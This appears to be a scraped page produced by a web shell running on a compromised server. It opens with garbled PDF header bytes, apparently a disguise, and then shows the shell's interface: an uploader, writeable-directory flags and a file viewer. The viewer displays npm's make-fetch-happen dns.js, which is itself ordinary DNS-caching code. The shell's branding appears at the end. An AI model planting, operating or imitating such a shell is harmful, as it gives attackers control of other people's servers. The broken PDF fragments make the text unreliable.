%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/local/lib/node_modules/npm/node_modules/make-fetch-happen/lib/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/local/lib/node_modules/npm/node_modules/make-fetch-happen/lib/dns.js
const LRUCache = require('lru-cache')
const dns = require('dns')

const defaultOptions = exports.defaultOptions = {
  family: undefined,
  hints: dns.ADDRCONFIG,
  all: false,
  verbatim: undefined,
}

const lookupCache = exports.lookupCache = new LRUCache({ max: 50 })

// this is a factory so that each request can have its own opts (i.e. ttl)
// while still sharing the cache across all requests
exports.getLookup = (dnsOptions) => {
  return (hostname, options, callback) => {
    if (typeof options === 'function') {
      callback = options
      options = null
    } else if (typeof options === 'number') {
      options = { family: options }
    }

    options = { ...defaultOptions, ...options }

    const key = JSON.stringify({
      hostname,
      family: options.family,
      hints: options.hints,
      all: options.all,
      verbatim: options.verbatim,
    })

    if (lookupCache.has(key)) {
      const [address, family] = lookupCache.get(key)
      process.nextTick(callback, null, address, family)
      return
    }

    dnsOptions.lookup(hostname, options, (err, address, family) => {
      if (err) {
        return callback(err)
      }

      lookupCache.set(key, [address, family], { ttl: dnsOptions.ttl })
      return callback(null, address, family)
    })
  }
}

Kontol Shell Bypass